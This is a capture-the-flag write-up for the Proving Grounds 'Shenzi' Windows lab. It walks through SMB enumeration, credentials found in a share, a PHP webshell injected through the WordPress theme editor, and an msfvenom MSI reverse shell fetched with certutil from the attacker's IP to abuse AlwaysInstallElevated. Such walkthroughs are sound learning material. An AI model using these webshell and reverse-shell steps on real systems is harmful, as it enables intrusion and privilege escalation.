Shenzi
Source: Proving Grounds OS: Windows Community Rating: Hard
Enumeration & Reconnaissance
Started with the usual autorecon and was literally bombarded with open ports: FTP (21), HTTP (80), RPC (135), SMB (139), HTTP (443), SMB (445), MySQL (3306), 5040, 7680, 49664 -> 49669
Service Analysis
FTP was configured to not allow anonymous access, so nothing could be done there for now.
I then started with HTTP (80). It displayed XAMPP’s default page.

When I tried to access phpMyAdmin, I received the message:
"New XAMPP security concept: Access to the requested directory is only available from the local network."

I searched online for a quick bypass in case there was an easy workaround, but nothing was found, so I moved on. HTTP (443) was just a replica of HTTP (80), and the fuzzers didn’t expose anything of value either.
I started checking SMB. I just checked the files from autorecon, enum4linux showed nothing, but then smbclient revealed a share named Shenzi.

I connected to the share using:
smbclient \192.168.213.55\Shenzi

Inside, I found a passwords.txt file:
### XAMPP Default Passwords ###
1) MySQL (phpMyAdmin):
User: root
Password:
(means no password!)
2) FileZilla FTP:
[ You have to create a new user on the FileZilla Interface ]
3) Mercury (not in the USB & lite version):
Postmaster: Postmaster (postmaster@localhost)
Administrator: Admin (admin@localhost)
User: newuser
Password: wampp
4) WEBDAV:
User: xampp-dav-unsecure
Password: ppmax2011
Attention: WEBDAV is not active since XAMPP Version 1.7.4.
For activation please comment out the httpd-dav.conf and
following modules in the httpd.conf
LoadModule dav_module modules/mod_dav.so
LoadModule dav_fs_module modules/mod_dav_fs.so
Please do not forget to refresh the WEBDAV authentification (users and passwords).
5) WordPress:
User: admin
Password: FeltHeadwallWight357
Most passwords were defaults, except for WordPress, which wasn’t the default. That should have hinted at something.
However, I couldn’t find any WordPress site. Even the fuzzers didn't expose any. I tried the credentials on FTP with no luck, and kept going in circles. I started looking for hints and that's where the name of the box/user came in handy, the WordPress site is deployed behind the username,
http://192.168.213.55/shenzi/
That's what I hate about CTFs in general, the type of guessing enumeration.

Gaining Initial Access
Since I already had the admin credentials for WordPress, I didn’t run wpscan. I logged in and checked if I could inject a shell into the PHP files. I went to Appearance > Theme Editor, chose a PHP file (I tested with 404.php), and injected a basic webshell:
if(isset($_REQUEST["cmd"])){ echo "<pre>"; $cmd = ($_REQUEST["cmd"]); system($cmd); echo "</pre>"; die; }

When that worked, I uploaded Ivan Sincek’s shell, which provided a reverse shell.

Privilege Escalation
Once inside, I ran the basic
whoami /priv
and then uploaded WinPeas. WinPeas exposed that:
AlwaysInstallElevated is set to 1 in HKLM
AlwaysInstallElevated is set to 1 in HKCU

This means any MSI package we install will run with elevated privileges. I then created an MSI shell using msfvenom:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.170 LPORT=8811 -f msi -o shell.msi
I then uploaded and executed it:
certutil -urlcache -split -f http://192.168.45.170:901/shell.msi
.\shell.msi

Lessons Learned
Always check for shares; in this case, the Shenzi share contained a passwords file that was key to moving forward.
Sometimes, manual guess-work (like identifying the WordPress site via the username) is necessary when automated tools or fuzzers yield nothing. (I hate it)
Injecting a shell via the theme editor in WordPress is an easy way to gain initial access.
The AlwaysInstallElevated setting in both HKLM and HKCU is a reliable privilege escalation vector on Windows.
Last updated